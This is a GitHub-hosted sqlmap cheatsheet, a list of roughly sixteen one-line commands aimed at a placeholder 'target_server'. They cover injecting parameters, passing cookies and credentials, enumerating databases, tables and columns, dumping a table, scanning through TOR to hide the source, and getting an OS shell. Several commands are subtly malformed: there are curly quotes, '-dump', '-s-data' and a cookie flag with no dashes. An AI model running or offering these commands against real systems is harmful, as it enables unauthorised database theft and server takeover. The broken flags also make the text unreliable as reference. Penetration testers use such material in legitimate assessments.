-
Notifications
You must be signed in to change notification settings - Fork 38
/
sqlmap cheatsheet
29 lines (29 loc) · 1.41 KB
/
sqlmap cheatsheet
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Simple usage
sqlmap -u “http://target_server/”
Specify target DBMS to MySQL
sqlmap -u “http://target_server/” --dbms=mysql
Using a proxy
sqlmap -u “http://target_server/” --proxy=http://proxy_address:port
Specify param1 to exploit
sqlmap -u “http://target_server/param1=value1¶m2=value2” -p param1
Use POST requests
sqlmap -u “http://target_server” --data=param1=value1¶m2=value2
Access with authenticated session
sqlmap -u “http://target_server” --data=param1=value1¶m2=value2 -p param1 cookie=’my_cookie_value’
Basic authentication
sqlmap -u “http://target_server” -s-data=param1=value1¶m2=value2 -p param1--auth-type=basic --auth-cred=username:password
Evaluating response strings
sqlmap -u “http://target_server/” --string=”This string if query is TRUE”
sqlmap -u “http://target_server/” --not-string=”This string if query is FALSE”
List databases
sqlmap -u “http://target_server/” --dbs
List tables of database target_DB
sqlmap -u “http://target_server/” -D target_DB --tables
Dump table target_Table of database target_DB
sqlmap -u “http://target_server/” -D target_DB -T target_Table -dump
List columns of table target_Table of database target_DB
sqlmap -u “http://target_server/” -D target_DB -T target_Table --columns
Scan through TOR
sqlmap -u “http://target_server/” --tor --tor-type=SOCKS5
Get OS Shell
sqlmap -u “http://target_server/” --os-shell